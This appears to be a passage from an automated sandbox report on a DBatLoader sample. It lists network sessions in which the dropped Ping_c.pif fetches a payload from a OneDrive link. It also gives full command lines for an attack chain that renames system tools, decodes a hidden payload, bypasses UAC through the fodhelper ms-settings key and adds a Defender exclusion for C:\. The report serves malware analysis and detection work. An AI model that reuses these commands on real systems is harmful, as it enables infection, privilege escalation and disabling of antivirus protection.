                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.85357613.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:49 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:49 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928629&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:akbGAkna3Ig=:pYwD/6lNQZtU30CZqFo8jFBg+sacPboYRMtAlr1mIZE=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b6664b3f-2d07-4a50-a0d8-89f6519f0a64&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:49 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:49 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-ql9tz
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 2687890832A0484685CD5F14B3774633 Ref B: BN3EDGE1122 Ref C: 2024-09-21T14:23:49Z
                            Date: Sat, 21 Sep 2024 14:23:49 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.85357913.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:52 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:53 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928632&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:tSesBEna3Ig=:YPfUauVjxxZJKoffjSFzUhy7CVLmPb8Je6GvVkU2oWI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=ecae0382-d775-4426-87dd-04f2646ba289&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:52 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:52 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-njql2
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 81FF912CAA324ED8AAE3EE701B5F1838 Ref B: BN3EDGE0621 Ref C: 2024-09-21T14:23:52Z
                            Date: Sat, 21 Sep 2024 14:23:52 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.85358213.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:55 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:56 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928636&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:LzSUBkna3Ig=:GeXC0FWT+KvzUs6903LmFIdDcpDwh4Cmq0LmEM4ymvY=:F; domain=.live.com; path=/
                            Set-Cookie: xid=8e8e6e9d-e3b0-44da-b198-2a3bc8b1ffd1&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:55 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:56 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-9slg4
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 15820A459C1F48B793950182DE495663 Ref B: BN3EDGE0712 Ref C: 2024-09-21T14:23:55Z
                            Date: Sat, 21 Sep 2024 14:23:55 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.85358513.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:58 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:59 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928639&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:/Vt5CEna3Ig=:Ge8QMeujMI1xE61Uku5b6qe7Jy95ESxN+HX1a2M+PEI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=18b3c5cd-be46-429a-8dce-3296176a7537&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:58 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:59 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-874vg
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 3260C76A838049238407C22B8198D83A Ref B: BN3EDGE0411 Ref C: 2024-09-21T14:23:58Z
                            Date: Sat, 21 Sep 2024 14:23:58 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.85358813.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:24:02 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:24:03 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928642&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:4mJyCkna3Ig=:qEL+o/XiYJ3AG3ZlMNFqUtAZLZNjHUWoLlmf+4xNkrs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=7f5c2ff9-b93f-42c8-aa52-983850b6d24c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:44:02 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:24:02 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-8hd77
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: E34948BA6DD945D797C97A50EAD1365B Ref B: BN3EDGE0205 Ref C: 2024-09-21T14:24:02Z
                            Date: Sat, 21 Sep 2024 14:24:01 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.85359113.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:24:06 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:24:06 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928646&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:2JnADEna3Ig=:rFnk2wKhmzICTL9YaTzJvjCfI96lGAJgBsoYOh/2EqA=:F; domain=.live.com; path=/
                            Set-Cookie: xid=d51b007a-7fc0-4931-9dd1-b218c1ff911c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:44:06 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:24:06 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-55l6j
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 897761AEB2F548998EAE3186873A0A28 Ref B: BN3EDGE0211 Ref C: 2024-09-21T14:24:06Z
                            Date: Sat, 21 Sep 2024 14:24:05 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.85359413.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:24:09 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:24:10 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928650&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:F2HfDkna3Ig=:J12wij6xTUBUe+LI6gar0tlCKiPxnjBkzYGsSojsfYE=:F; domain=.live.com; path=/
                            Set-Cookie: xid=c10eb0e4-0229-454a-981a-7c23d76f14d7&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:44:09 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:24:10 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-fsmjf
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 5F38E9E60F114BE9AF7E2707312322FA Ref B: BN3EDGE0715 Ref C: 2024-09-21T14:24:09Z
                            Date: Sat, 21 Sep 2024 14:24:09 GMT
                            Connection: close
                            Content-Length: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" "
                            Imagebase:0x7ff6f45d0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:1
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6ee680000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:3
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:4
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:10:22:06
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:10:22:06
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:10:22:06
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:8
                            Start time:10:22:07
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:10:22:07
                            Start date:21/09/2024
                            Path:C:\Users\Public\kn.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
                            Imagebase:0x7ff607f50000
                            File size:1'651'712 bytes
                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:10
                            Start time:10:22:07
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:12
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:13
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:14
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:15
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:10:22:09
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:10:22:09
                            Start date:21/09/2024
                            Path:C:\Users\Public\xkn.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                            Imagebase:0x7ff6bb8e0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:18
                            Start time:10:22:11
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:10:22:11
                            Start date:21/09/2024
                            Path:C:\Users\Public\ger.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                            Imagebase:0x7ff73a390000
                            File size:77'312 bytes
                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:20
                            Start time:10:22:12
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:10:22:12
                            Start date:21/09/2024
                            Path:C:\Users\Public\kn.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                            Imagebase:0x7ff607f50000
                            File size:1'651'712 bytes
                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:10:22:13
                            Start date:21/09/2024
                            Path:C:\Windows \System32\per.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\\Windows \\System32\\per.exe"
                            Imagebase:0x7ff739d20000
                            File size:49'664 bytes
                            MD5 hash:85018BE1FD913656BC9FF541F017EACD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 3%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:28
                            Start time:10:22:15
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:29
                            Start time:10:22:15
                            Start date:21/09/2024
                            Path:C:\Windows\System32\taskkill.exe
                            Wow64 process (32bit):false
                            Commandline:taskkill /F /IM SystemSettings.exe
                            Imagebase:0x7ff6d8430000
                            File size:101'376 bytes
                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:10:22:15
                            Start date:21/09/2024
                            Path:C:\Windows\System32\SystemSettingsAdminFlows.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                            Imagebase:0x7ff7863e0000
                            File size:519'080 bytes
                            MD5 hash:5FA3EEF00388ED6344B4C35BA7CAA460
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\Libraries\Ping_c.pif
                            Wow64 process (32bit):true
                            Commandline:C:\Users\Public\Libraries\Ping_c.pif
                            Imagebase:0x400000
                            File size:1'443'840 bytes
                            MD5 hash:66561F313D11178EEE1955CE46E4CEA0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Yara matches:
                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            Has exited:false

                            General

                            Target ID:32
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
